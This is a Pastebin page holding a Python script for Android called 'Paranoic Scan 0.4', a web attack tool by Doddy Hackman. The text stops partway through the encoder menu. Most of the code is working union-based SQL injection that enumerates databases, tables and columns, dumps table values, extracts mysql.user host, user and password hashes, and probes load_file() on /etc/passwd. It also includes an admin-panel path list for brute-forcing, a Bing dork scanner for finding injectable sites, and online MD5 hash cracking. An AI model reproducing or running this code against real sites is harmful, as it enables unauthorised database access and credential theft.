API tools faq
paste
Guest User

Untitled

a guest
Mar 15th, 2017
50
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 41.09 KB | None | 0 0
raw download clone embed print report
  1. #!usr/bin/python
  2. # -*- coding: utf-8 -*-
  3. #################################################################################
  4. #This software is Copyright (c) 2015 by Doddy Hackman.
  5. #
  6. #This is free software, licensed under:
  7. #
  8. # The Artistic License 1.0
  9. #
  10. #The Artistic License
  11. #
  12. #Preamble
  13. #
  14. #The intent of this document is to state the conditions under which a Package
  15. #may be copied, such that the Copyright Holder maintains some semblance of
  16. #artistic control over the development of the package, while giving the users of
  17. #the package the right to use and distribute the Package in a more-or-less
  18. #customary fashion, plus the right to make reasonable modifications.
  19. #
  20. #Definitions:
  21. #
  22. # - "Package" refers to the collection of files distributed by the Copyright
  23. # Holder, and derivatives of that collection of files created through
  24. # textual modification.
  25. # - "Standard Version" refers to such a Package if it has not been modified,
  26. # or has been modified in accordance with the wishes of the Copyright
  27. # Holder.
  28. # - "Copyright Holder" is whoever is named in the copyright or copyrights for
  29. # the package.
  30. # - "You" is you, if you're thinking about copying or distributing this Package.
  31. # - "Reasonable copying fee" is whatever you can justify on the basis of media
  32. # cost, duplication charges, time of people involved, and so on. (You will
  33. # not be required to justify it to the Copyright Holder, but only to the
  34. # computing community at large as a market that must bear the fee.)
  35. # - "Freely Available" means that no fee is charged for the item itself, though
  36. # there may be fees involved in handling the item. It also means that
  37. # recipients of the item may redistribute it under the same conditions they
  38. # received it.
  39. #
  40. #1. You may make and give away verbatim copies of the source form of the
  41. #Standard Version of this Package without restriction, provided that you
  42. #duplicate all of the original copyright notices and associated disclaimers.
  43. #
  44. #2. You may apply bug fixes, portability fixes and other modifications derived
  45. #from the Public Domain or from the Copyright Holder. A Package modified in such
  46. #a way shall still be considered the Standard Version.
  47. #
  48. #3. You may otherwise modify your copy of this Package in any way, provided that
  49. #you insert a prominent notice in each changed file stating how and when you
  50. #changed that file, and provided that you do at least ONE of the following:
  51. #
  52. # a) place your modifications in the Public Domain or otherwise make them
  53. # Freely Available, such as by posting said modifications to Usenet or an
  54. # equivalent medium, or placing the modifications on a major archive site
  55. # such as ftp.uu.net, or by allowing the Copyright Holder to include your
  56. # modifications in the Standard Version of the Package.
  57. #
  58. # b) use the modified Package only within your corporation or organization.
  59. #
  60. # c) rename any non-standard executables so the names do not conflict with
  61. # standard executables, which must also be provided, and provide a separate
  62. # manual page for each non-standard executable that clearly documents how it
  63. # differs from the Standard Version.
  64. #
  65. # d) make other distribution arrangements with the Copyright Holder.
  66. #
  67. #4. You may distribute the programs of this Package in object code or executable
  68. #form, provided that you do at least ONE of the following:
  69. #
  70. # a) distribute a Standard Version of the executables and library files,
  71. # together with instructions (in the manual page or equivalent) on where to
  72. # get the Standard Version.
  73. #
  74. # b) accompany the distribution with the machine-readable source of the Package
  75. # with your modifications.
  76. #
  77. # c) accompany any non-standard executables with their corresponding Standard
  78. # Version executables, giving the non-standard executables non-standard
  79. # names, and clearly documenting the differences in manual pages (or
  80. # equivalent), together with instructions on where to get the Standard
  81. # Version.
  82. #
  83. # d) make other distribution arrangements with the Copyright Holder.
  84. #
  85. #5. You may charge a reasonable copying fee for any distribution of this
  86. #Package. You may charge any fee you choose for support of this Package. You
  87. #may not charge a fee for this Package itself. However, you may distribute this
  88. #Package in aggregate with other (possibly commercial) programs as part of a
  89. #larger (possibly commercial) software distribution provided that you do not
  90. #advertise this Package as a product of your own.
  91. #
  92. #6. The scripts and library files supplied as input to or produced as output
  93. #from the programs of this Package do not automatically fall under the copyright
  94. #of this Package, but belong to whomever generated them, and may be sold
  95. #commercially, and may be aggregated with this Package.
  96. #
  97. #7. C or perl subroutines supplied by you and linked into this Package shall not
  98. #be considered part of this Package.
  99. #
  100. #8. The name of the Copyright Holder may not be used to endorse or promote
  101. #products derived from this software without specific prior written permission.
  102. #
  103. #9. THIS PACKAGE IS PROVIDED "AS IS" AND WITHOUT ANY EXPRESS OR IMPLIED
  104. #WARRANTIES, INCLUDING, WITHOUT LIMITATION, THE IMPLIED WARRANTIES OF
  105. #MERCHANTIBILITY AND FITNESS FOR A PARTICULAR PURPOSE.
  106. #
  107. #The End
  108. #
  109. #################################################################################
  110. #Paranoic Scan 0.4
  111. #Android Version
  112. #(C) Doddy Hackman 2015
  113. #################################################################################
  114.  
  115. import android,urllib2,socket,binascii,re,base64,hashlib
  116.  
  117. webvul = ""
  118.  
  119. # Functions
  120.  
  121. def hexencoder(texto):
  122. return "[+] Result : "+"0x"+str(binascii.hexlify(texto))
  123.  
  124. def hexdecoder(texto):
  125. text = re.sub("0x","",texto)
  126. return "[+] Result : "+binascii.unhexlify(text)
  127.  
  128. def base64encoder(texto):
  129. return "[+] Result : "+base64.b64encode(texto)
  130.  
  131. def base64decoder(texto):
  132. return "[+] Result : "+base64.b64decode(texto)
  133.  
  134. def md5encoder(texto):
  135. return "[+] Result : "+hashlib.md5(texto).hexdigest()
  136.  
  137. def reem(texto,parte):
  138. return re.sub(parte,"hackman",texto)
  139.  
  140. def regexver(code):
  141. if (re.findall("K0BRA(.*?)K0BRA",code)):
  142. return True
  143. else:
  144. return False
  145.  
  146. def regexdar(code):
  147. if (re.findall("K0BRA(.*?)K0BRA",code)):
  148. return re.findall("K0BRA(.*?)K0BRA",code)[0]
  149.  
  150. def toma(web) :
  151. nave = urllib2.Request(web)
  152. nave.add_header('User-Agent','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5');
  153. op = urllib2.build_opener()
  154. return op.open(nave).read()
  155.  
  156. def tomar(web,vars) :
  157. nave = urllib2.build_opener()
  158. nave.add_header = [('User-Agent','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5')]
  159. return nave.open(web,vars).read()
  160.  
  161. def getdata(web) :
  162. nave = urllib2.Request(web)
  163. nave.add_header('User-Agent','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5');
  164. op = urllib2.build_opener()
  165. return op.open(nave).info()
  166.  
  167. def bypass(bypass):
  168. if bypass == "--":
  169. return("+","--")
  170. elif bypass == "/*":
  171. return("/**/","/**/")
  172. else:
  173. return("+","--")
  174.  
  175. def showtables(web):
  176. pass1,pass2 = bypass("--")
  177. respuesta = ""
  178. web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(table_name),0x4b30425241)))",web)
  179. web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))",web)
  180. code1 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2)
  181. respuesta = respuesta + "[+] Searching tables ...\n\n"
  182. if (re.findall("K0BRA(.*?)K0BRA",code1)):
  183. numbers = re.findall("K0BRA(.*?)K0BRA",code1)
  184. numbers = numbers[0]
  185. respuesta = respuesta + "[+] Tables Found : "+numbers+"\n\n"
  186. for counter in range(17,int(numbers)):
  187. code2 = toma(web2+pass1+"from"+pass1+"information_schema.tables"+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
  188. if (re.findall("K0BRA(.*?)K0BRA",code2)):
  189. table = re.findall("K0BRA(.*?)K0BRA",code2)
  190. table = table[0]
  191. respuesta = respuesta + "[Table Found] : "+table+"\n"
  192. else:
  193. respuesta = respuesta + "[-] Not Found\n"
  194. respuesta = respuesta + "\n[+] Finished"
  195. return respuesta
  196.  
  197. def showcolumns(web,tabla):
  198. respuesta = ""
  199. pass1,pass2 = bypass("--")
  200. tabla2 = tabla
  201. tabla = "0x"+str(binascii.hexlify(tabla))
  202. web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(column_name),0x4b30425241)))",web)
  203. web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))",web)
  204. code1 = toma(web1+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tabla+pass2)
  205. respuesta = respuesta + "[+] Searching columns ...\n\n"
  206. if (re.findall("K0BRA(.*?)K0BRA",code1)):
  207. numbers = re.findall("K0BRA(.*?)K0BRA",code1)
  208. numbers = numbers[0]
  209. respuesta = respuesta + "[+] Columns Found : "+numbers+"\n"
  210. for counter in range(0,int(numbers)):
  211. code2 = toma(web2+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tabla+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
  212. if (re.findall("K0BRA(.*?)K0BRA",code2)):
  213. column = re.findall("K0BRA(.*?)K0BRA",code2)
  214. column = column[0]
  215. respuesta = respuesta + "\n[Column Found in table "+str(tabla2)+"] : "+str(column)
  216. else:
  217. respuesta = respuesta + "[-] Not Found"
  218. respuesta = respuesta + "\n\n[+] Finished"
  219. return respuesta
  220.  
  221. def showdbs(web):
  222. respuesta = ""
  223. pass1,pass2 = bypass("--")
  224. web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
  225. web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,schema_name,0x4b30425241)))",web)
  226. code1 = toma(web1+pass1+"from"+pass1+"information_schema.schemata"+pass2)
  227. respuesta = respuesta + "[+] Searching DBS ...\n\n"
  228. if (re.findall("K0BRA(.*?)K0BRA",code1)):
  229. numbers = re.findall("K0BRA(.*?)K0BRA",code1)
  230. numbers = numbers[0]
  231. respuesta = respuesta + "[+] DBS Found : "+numbers+"\n"
  232. for counter in range(0,int(numbers)):
  233. code2 = toma(web2+pass1+"from"+pass1+"information_schema.schemata"+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
  234. if (re.findall("K0BRA(.*?)K0BRA",code2)):
  235. db = re.findall("K0BRA(.*?)K0BRA",code2)
  236. db = db[0]
  237. respuesta = respuesta + "\n[DB Found] : "+db
  238. else:
  239. respuesta = respuesta + "[-] Not Found"
  240. respuesta = respuesta + "\n\n[+] Finished"
  241. return respuesta
  242.  
  243. def dumper(web,table,col1,col2):
  244. respuesta = ""
  245. pass1,pass2 = bypass("--")
  246. web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
  247. web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,"+col1+",0x4b30425241,0x4B3042524131,"+col2+",0x4B3042524131)))",web)
  248. code1 = toma(web1+pass1+"from"+pass1+table+pass2)
  249. respuesta = respuesta + "[+] Searching values ...\n\n"
  250. if (re.findall("K0BRA(.*?)K0BRA",code1)):
  251. numbers = re.findall("K0BRA(.*?)K0BRA",code1)
  252. numbers = numbers[0]
  253. respuesta = respuesta + "[+] Values Found : "+numbers+"\n"
  254. for counter in range(0,int(numbers)):
  255. code2 = toma(web2+pass1+"from"+pass1+table+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
  256. if (re.findall("K0BRA(.*?)K0BRA",code2)):
  257. c1 = re.findall("K0BRA(.*?)K0BRA",code2)
  258. c1 = c1[0]
  259. c2 = re.findall("K0BRA1(.*?)K0BRA1",code2)
  260. c2 = c2[0]
  261. respuesta = respuesta + "\n["+col1+"] : "+c1+"\n"
  262. respuesta = respuesta + "["+col2+"] : "+c2+"\n"
  263. else:
  264. respuesta = respuesta + "[-] Not Found\n"
  265. respuesta = respuesta + "\n[+] Finished"
  266. return respuesta
  267.  
  268. def mysqluser(web):
  269. pass1,pass2 = bypass("--")
  270. respuesta = ""
  271. web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
  272. web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,Host,0x4b30425241,0x4B3042524131,User,0x4B3042524131,0x4B3042524132,Password,0x4B3042524132)))",web)
  273. code1 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2)
  274. respuesta = respuesta + "[+] Searching mysql.user ...\n\n"
  275. if (re.findall("K0BRA(.*?)K0BRA",code1)):
  276. numbers = re.findall("K0BRA(.*?)K0BRA",code1)
  277. numbers = numbers[0]
  278. respuesta = respuesta + "[+] Users Found : "+numbers+"\n"
  279. for counter in range(0,int(numbers)):
  280. code2 = toma(web2+pass1+"from"+pass1+"mysql.user"+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
  281. if (re.findall("K0BRA(.*?)K0BRA",code2)):
  282. host = re.findall("K0BRA(.*?)K0BRA",code2)
  283. host = host[0]
  284. user = re.findall("K0BRA1(.*?)K0BRA1",code2)
  285. user = user[0]
  286. passw = re.findall("K0BRA2(.*?)K0BRA2",code2)
  287. passw = passw[0]
  288. respuesta = respuesta + "\n[Host] : "+host
  289. respuesta = respuesta + "\n[User] : "+user
  290. respuesta = respuesta + "\n[Pass] : "+passw+"\n"
  291. else:
  292. respuesta = respuesta + "[-] Not Found\n"
  293. respuesta = respuesta + "\n[+] Finished"
  294. return respuesta
  295.  
  296. def showcolumnsdb(web,db,table):
  297. respuesta = ""
  298. db2 = db
  299. table2 = table
  300. db = "0x"+str(binascii.hexlify(db))
  301. table = "0x"+str(binascii.hexlify(table))
  302. pass1,pass2 = bypass("--")
  303. web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
  304. web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))",web)
  305. code1 = toma(web1+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+table+pass1+"and"+pass1+"table_schema="+db+pass2)
  306. respuesta = respuesta + "[+] Searching columns in DB ...\n"
  307. if (re.findall("K0BRA(.*?)K0BRA",code1)):
  308. numbers = re.findall("K0BRA(.*?)K0BRA",code1)
  309. numbers = numbers[0]
  310. respuesta = respuesta + "\n[+] Columns Found : "+str(numbers)+"\n"
  311. for counter in range(0,int(numbers)):
  312. code2 = toma(web2+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+table+pass1+"and"+pass1+"table_schema="+db+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
  313. if (re.findall("K0BRA(.*?)K0BRA",code2)):
  314. column = re.findall("K0BRA(.*?)K0BRA",code2)
  315. column = column[0]
  316. respuesta = respuesta + "\n[Column Found] : "+str(column)
  317. else:
  318. respuesta = respuesta + "\n[-] Not Found"
  319. respuesta = respuesta + "\n\n[+] Finished"
  320. return respuesta
  321.  
  322. def showtablesdb(web,db):
  323. respuesta = ""
  324. db2 = db
  325. db = "0x"+str(binascii.hexlify(db))
  326. pass1,pass2 = bypass("--")
  327. web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
  328. web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))",web)
  329. code1 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass1+"where"+pass1+"table_schema="+db+pass2)
  330. respuesta = respuesta + "[+] Searching tables in DB ...\n\n"
  331. if (re.findall("K0BRA(.*?)K0BRA",code1)):
  332. numbers = re.findall("K0BRA(.*?)K0BRA",code1)
  333. numbers = numbers[0]
  334. respuesta = respuesta + "[+] Tables Found : "+str(numbers)+"\n"
  335. for counter in range(0,int(numbers)):
  336. code2 = toma(web2+pass1+"from"+pass1+"information_schema.tables"+pass1+"where"+pass1+"table_schema="+db+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
  337. if (re.findall("K0BRA(.*?)K0BRA",code2)):
  338. table = re.findall("K0BRA(.*?)K0BRA",code2)
  339. table = table[0]
  340. respuesta = respuesta + "\n[Table Found] : "+table
  341. else:
  342. respuesta = respuesta + "[-] Not Found"
  343. respuesta = respuesta + "\n\n[+] Finished"
  344. return respuesta
  345.  
  346. def more(web):
  347. respuesta = ""
  348. pass1,pass2 = bypass("--")
  349. otraweb = web
  350. respuesta = respuesta + "[+] Searching DB Details ...\n"
  351. hextest = "0x2f6574632f706173737764"
  352. web1 = re.sub("hackman","unhex(hex(concat(0x334d50335a3452,0x4b30425241,user(),0x4b30425241,database(),0x4b30425241,version(),0x4b30425241,0x334d50335a3452)))",web)
  353. web2 = re.sub("hackman","unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file("+hextest+"))))",otraweb)
  354. code0 = toma(web1+pass2)
  355. if (re.findall("3MP3Z4R(.*?)3MP3Z4R",code0)):
  356. datax = re.findall("3MP3Z4R(.*?)3MP3Z4R",code0)
  357. datar = re.split("K0BRA",datax[0])
  358. respuesta = respuesta + "\n[+] Username : "+datar[1]
  359. respuesta = respuesta + "\n[+] Database : "+datar[2]
  360. respuesta = respuesta + "\n[+] Version : "+datar[3]+"\n"
  361.  
  362. code1 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2)
  363. if (re.findall("K0BRA",code1)):
  364. respuesta = respuesta + "\n[+] mysql.user : on"
  365. code2 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2)
  366. if (re.findall("K0BRA",code2)):
  367. respuesta = respuesta + "\n[+] information_schema.tables : on"
  368. codetres = toma(web2)
  369. if (re.findall("ERTOR854",codetres)):
  370. respuesta = respuesta + "\n[+] load_file() : on"
  371. respuesta = respuesta + "\n\n[+] Finished"
  372. return respuesta
  373.  
  374. def httpfinger(target):
  375. respuesta = ""
  376. try:
  377. respuesta = respuesta + str(getdata(target))
  378. except:
  379. respuesta = respuesta + "[-] Error"
  380. return respuesta
  381.  
  382. def scanpanel(web):
  383. contador = 0
  384. panels=['admin/admin.asp','admin/login.asp','admin/index.asp','admin/admin.aspx','admin/login.aspx','admin/index.aspx','admin/webmaster.asp','admin/webmaster.aspx','asp/admin/index.asp','asp/admin/index.aspx','asp/admin/admin.asp','asp/admin/admin.aspx','asp/admin/webmaster.asp','asp/admin/webmaster.aspx','admin/','login.asp','login.aspx','admin.asp','admin.aspx','webmaster.aspx','webmaster.asp','login/index.asp','login/index.aspx','login/login.asp','login/login.aspx','login/admin.asp','login/admin.aspx','administracion/index.asp','administracion/index.aspx','administracion/login.asp','administracion/login.aspx','administracion/webmaster.asp','administracion/webmaster.aspx','administracion/admin.asp','administracion/admin.aspx','php/admin/','admin/admin.php','admin/index.php','admin/login.php','admin/system.php','admin/ingresar.php','admin/administrador.php','admin/default.php','administracion/','administracion/index.php','administracion/login.php','administracion/ingresar.php','administracion/admin.php','administration/','administration/index.php','administration/login.php','administrator/index.php','administrator/login.php','administrator/system.php','system/','system/login.php','admin.php','login.php','administrador.php','administration.php','administrator.php','admin1.html','admin1.php','admin2.php','admin2.html','yonetim.php','yonetim.html','yonetici.php','yonetici.html','adm/','admin/account.php','admin/account.html','admin/index.html','admin/login.html','admin/home.php','admin/controlpanel.html','admin/controlpanel.php','admin.html','admin/cp.php','admin/cp.html','cp.php','cp.html','administrator/','administrator/index.html','administrator/login.html','administrator/account.html','administrator/account.php','administrator.html','login.html','modelsearch/login.php','moderator.php','moderator.html','moderator/login.php','moderator/login.html','moderator/admin.php','moderator/admin.html','moderator/','account.php','account.html','controlpanel/','controlpanel.php','controlpanel.html','admincontrol.php','admincontrol.html','adminpanel.php','adminpanel.html','admin1.asp','admin2.asp','yonetim.asp','yonetici.asp','admin/account.asp','admin/home.asp','admin/controlpanel.asp','admin/cp.asp','cp.asp','administrator/index.asp','administrator/login.asp','administrator/account.asp','administrator.asp','modelsearch/login.asp','moderator.asp','moderator/login.asp','moderator/admin.asp','account.asp','controlpanel.asp','admincontrol.asp','adminpanel.asp','fileadmin/','fileadmin.php','fileadmin.asp','fileadmin.html','administration.html','sysadmin.php','sysadmin.html','phpmyadmin/','myadmin/','sysadmin.asp','sysadmin/','ur-admin.asp','ur-admin.php','ur-admin.html','ur-admin/','Server.php','Server.html','Server.asp','Server/','wp-admin/','administr8.php','administr8.html','administr8/','administr8.asp','webadmin/','webadmin.php','webadmin.asp','webadmin.html','administratie/','admins/','admins.php','admins.asp','admins.html','administrivia/','Database_Administration/','WebAdmin/','useradmin/','sysadmins/','admin1/','system-administration/','administrators/','pgadmin/','directadmin/','staradmin/','ServerAdministrator/','SysAdmin/','administer/','LiveUser_Admin/','sys-admin/','typo3/','panel/','cpanel/','cPanel/','cpanel_file/','platz_login/','rcLogin/','blogindex/','formslogin/','autologin/','support_login/','meta_login/','manuallogin/','simpleLogin/','loginflat/','utility_login/','showlogin/','memlogin/','members/','login-redirect/','sub-login/','wp-login/','login1/','dir-login/','login_db/','xlogin/','smblogin/','customer_login/','UserLogin/','login-us/','acct_login/','admin_area/','bigadmin/','project-admins/','phppgadmin/','pureadmin/','sql-admin/','radmind/','openvpnadmin/','wizmysqladmin/','vadmind/','ezsqliteadmin/','hpwebjetadmin/','newsadmin/','adminpro/','Lotus_Domino_Admin/','bbadmin/','vmailadmin/','Indy_admin/','ccp14admin/','irc-macadmin/','banneradmin/','sshadmin/','phpldapadmin/','macadmin/','administratoraccounts/','admin4_account/','admin4_colon/','radmind-1/','Super-Admin/','AdminTools/','cmsadmin/','SysAdmin2/','globes_admin/','cadmins/','phpSQLiteAdmin/','navSiteAdmin/','server_admin_small/','logo_sysadmin/','server/','database_administration/','power_user/','system_administration/','ss_vms_admin_sm/']
  385. respuesta = ""
  386. respuesta = respuesta + "[+] Scanning ...\n"
  387. for path in panels:
  388. try:
  389. toma(web+"/"+path)
  390. respuesta = respuesta + "\n[+] Link : "+web+"/"+path
  391. contador = contador + 1
  392. except urllib2.URLError, e:
  393. pass
  394.  
  395. if(contador==0) :
  396. respuesta = respuesta + "\n[+] Not Found"
  397. respuesta = respuesta + "\n\n[+] Finished"
  398. return respuesta
  399.  
  400. def crackmd5(md5) :
  401. respuesta = ""
  402. code = tomar("http://md5online.net/index.php","pass="+md5+"&option=hash2text&send=Submit")
  403. if (re.findall("<center><p>md5 :<b>(.*?)<\/b> <br>pass : <b>(.*?)<\/b><\/p>",code)):
  404. rex = re.findall("<center><p>md5 :<b>(.*?)<\/b> <br>pass : <b>(.*?)<\/b><\/p>",code)
  405. return "[+] Hash : "+rex[0][1]
  406. else:
  407. code = tomar("http://md5decryption.com/index.php","hash="+md5+"&submit=Decrypt It!")
  408. if (re.findall("Decrypted Text: <\/b>(.*?)<\/font>",code)):
  409. rex = re.findall("Decrypted Text: <\/b>(.*?)<\/font>",code)
  410. return "[+] Hash : "+rex[0]
  411. else:
  412. code = tomar("http://md5.my-addr.com/md5_decrypt-md5_cracker_online/md5_decoder_tool.php","md5="+md5)
  413. if (re.findall("<span class='middle_title'>Hashed string<\/span>: (.*?)<\/div>",code)):
  414. rex = re.findall("<span class='middle_title'>Hashed string<\/span>: (.*?)<\/div>",code)
  415. return "[+] Hash : "+rex[0]
  416. else:
  417. return "[+] Hash : Not Found"
  418. return respuesta
  419.  
  420. def locateip(pagina):
  421.  
  422. respuesta = ""
  423.  
  424. ip = socket.gethostbyname(str(pagina))
  425. code = tomar("http://www.melissadata.com/lookups/iplocation.asp?ipaddress=","ipaddress="+ip+"&Submit=submit")
  426.  
  427. respuesta = respuesta + "[++] IP Address Location\n"
  428.  
  429. if (re.findall("City<\/td><td align=(.*)><b>(.*)<\/b><\/td>",code)):
  430. rex = re.findall("City<\/td><td align=(.*)><b>(.*)<\/b><\/td>",code)
  431. city = rex[0][1]
  432. respuesta = respuesta + "\n[++] City : "+city
  433. else:
  434. respuesta = respuesta + "\n[++] City : Not Found"
  435.  
  436. if (re.findall("Country<\/td><td align=(.*)><b>(.*)<\/b><\/td>",code)):
  437. rex = re.findall("Country<\/td><td align=(.*)><b>(.*)<\/b><\/td>",code)
  438. country = rex[0][1]
  439. respuesta = respuesta + "\n[++] Country : "+country
  440. else:
  441. respuesta = respuesta + "\n[++] Country : Not Found"
  442.  
  443. if (re.findall("State or Region<\/td><td align=(.*)><b>(.*)<\/b><\/td>",code)):
  444. rex = re.findall("State or Region<\/td><td align=(.*)><b>(.*)<\/b><\/td>",code)
  445. state = rex[0][1]
  446. respuesta = respuesta + "\n[++] State : "+state
  447. else:
  448. respuesta = respuesta + "\n[++] State : Not Found"
  449.  
  450. code = toma("http://www.ip-adress.com/reverse_ip/"+ip)
  451.  
  452. if (re.findall("whois\/(.*?)\">Whois",code)):
  453. rex = re.findall("whois\/(.*?)\">Whois",code)
  454. respuesta = respuesta + "\n\n[++] DNS Founds\n"
  455. for dns in rex:
  456. if not dns == "":
  457. respuesta = respuesta + "\n[+] "+dns
  458.  
  459. return respuesta
  460.  
  461. def sqltest(webs):
  462. respuesta = ""
  463. for web in webs :
  464. if re.findall("=",web):
  465. web = re.split("=",web)
  466. web = web[0]+"="
  467.  
  468. try:
  469. code = toma(web+"-1+union+select+1--")
  470. if (re.findall("The used SELECT statements have a different number of columns",code,re.I)):
  471. respuesta = respuesta + "[SQLI] : "+web+"\n"
  472. except:
  473. pass
  474. return respuesta
  475.  
  476. def limpiar(pag):
  477.  
  478. limpia = []
  479. for p in pag:
  480. if p not in limpia:
  481. limpia.append(p)
  482. return limpia
  483.  
  484. def bingscan(dork,count):
  485.  
  486. respuesta = ""
  487.  
  488. pag = []
  489. s = 10
  490.  
  491. while s <= int(count):
  492. try:
  493. code = toma("http://www.bing.com/search?q="+str(dork)+"&first="+str(s))
  494. d = re.findall("<h3><a href=\"(.*?)\"",code,re.I)
  495. e = re.findall("<h2><a href=\"(.*?)\"",code,re.I)
  496. s += 10
  497. for a in d:
  498. pag.append(a)
  499. for b in e:
  500. pag.append(b)
  501.  
  502. except:
  503. pass
  504.  
  505. pag = limpiar(pag)
  506.  
  507. return pag
  508.  
  509.  
  510. ##
  511.  
  512. aplicacion = android.Android()
  513.  
  514. def menuencoder():
  515.  
  516. aplicacion.dialogCreateAlert("Encoders")
  517. aplicacion.dialogSetItems(["MD5 Encoder","Base64 Encoder","Base64 Decoder","Hex Encoder","Hex Decoder","Exit"])
  518. aplicacion.dialogShow()
  519. reh = aplicacion.dialogGetResponse().result
  520. reb = reh["item"]
  521.  
  522. if reb==0:
  523.  
  524. aplicacion.dialogCreateAlert("MD5 Encoder")
  525.  
  526. aplicacion.dialogGetInput("MD5 Encoder","Enter Text")
  527. ref = aplicacion.dialogGetResponse().result
  528.  
  529. if not ref['which'] == 'positive' :
  530. menuencoder()
  531. else:
  532. texto = ref['value']
  533.  
  534. aplicacion.dialogCreateSpinnerProgress("MD5 Encoder","[+] Encoding ...")
  535. aplicacion.dialogShow()
  536.  
  537. don = md5encoder(texto)
  538.  
  539. aplicacion.dialogDismiss()
  540.  
  541. aplicacion.dialogCreateAlert("MD5 Encoder",don)
  542. aplicacion.dialogSetPositiveButtonText("Done")
  543. aplicacion.dialogShow()
  544.  
  545. op = aplicacion.dialogGetResponse().result
  546.  
  547. if op["which"] == "positive" :
  548. menuencoder()
  549.  
  550.  
  551. if reb==1 :
  552.  
  553. aplicacion.dialogCreateAlert("Base64 Encoder")
  554.  
  555. aplicacion.dialogGetInput("Base64 Encoder","Enter Text")
  556. ref = aplicacion.dialogGetResponse().result
  557.  
  558. if not ref['which'] == 'positive' :
  559. menuencoder()
  560. else:
  561. texto = ref['value']
  562.  
  563. aplicacion.dialogCreateSpinnerProgress("Base64 Encoder","[+] Encoding ...")
  564. aplicacion.dialogShow()
  565.  
  566. don = base64encoder(texto)
  567.  
  568. aplicacion.dialogDismiss()
  569.  
  570. aplicacion.dialogCreateAlert("Base64 Encoder",don)
  571. aplicacion.dialogSetPositiveButtonText("Done")
  572. aplicacion.dialogShow()
  573.  
  574. op = aplicacion.dialogGetResponse().result
  575.  
  576. if op["which"] == "positive" :
  577. menuencoder()
  578.  
  579. if reb==2 :
  580.  
  581. aplicacion.dialogCreateAlert("Base64 Decoder")
  582.  
  583. aplicacion.dialogGetInput("Base64 Decoder","Enter Text")
  584. ref = aplicacion.dialogGetResponse().result
  585.  
  586. if not ref['which'] == 'positive' :
  587. menuencoder()
  588. else:
  589. texto = ref['value']
  590.  
  591. aplicacion.dialogCreateSpinnerProgress("Base64 Decoder","[+] Encoding ...")
  592. aplicacion.dialogShow()
  593.  
  594. don = base64decoder(texto)
  595.  
  596. aplicacion.dialogDismiss()
  597.  
  598. aplicacion.dialogCreateAlert("Base64 Decoder",don)
  599. aplicacion.dialogSetPositiveButtonText("Done")
  600. aplicacion.dialogShow()
  601.  
  602. op = aplicacion.dialogGetResponse().result
  603.  
  604. if op["which"] == "positive" :
  605. menuencoder()
  606.  
  607. if reb==3 :
  608.  
  609. aplicacion.dialogCreateAlert("Hex Encoder")
  610.  
  611. aplicacion.dialogGetInput("Hex Encoder","Enter Text")
  612. ref = aplicacion.dialogGetResponse().result
  613.  
  614. if not ref['which'] == 'positive' :
  615. menuencoder()
  616. else:
  617. texto = ref['value']
  618.  
  619. aplicacion.dialogCreateSpinnerProgress("Hex Encoder","[+] Encoding ...")
  620. aplicacion.dialogShow()
  621.  
  622. don = hexencoder(texto)
  623.  
  624. aplicacion.dialogDismiss()
  625.  
  626. aplicacion.dialogCreateAlert("Hex Encoder",don)
  627. aplicacion.dialogSetPositiveButtonText("Done")
  628. aplicacion.dialogShow()
  629.  
  630. op = aplicacion.dialogGetResponse().result
  631.  
  632. if op["which"] == "positive" :
  633. menuencoder()
  634.  
  635.  
  636. if reb==4 :
  637.  
  638. aplicacion.dialogCreateAlert("Hex Decoder")
  639.  
  640. aplicacion.dialogGetInput("Hex Decoder","Enter Text")
  641. ref = aplicacion.dialogGetResponse().result
  642.  
  643. if not ref['which'] == 'positive' :
  644. menuencoder()
  645. else:
  646. texto = ref['value']
  647.  
  648. aplicacion.dialogCreateSpinnerProgress("Hex Decoder","[+] Encoding ...")
  649. aplicacion.dialogShow()
  650.  
  651. don = hexdecoder(texto)
  652.  
  653. aplicacion.dialogDismiss()
  654.  
  655. aplicacion.dialogCreateAlert("Hex Decoder",don)
  656. aplicacion.dialogSetPositiveButtonText("Done")
  657. aplicacion.dialogShow()
  658.  
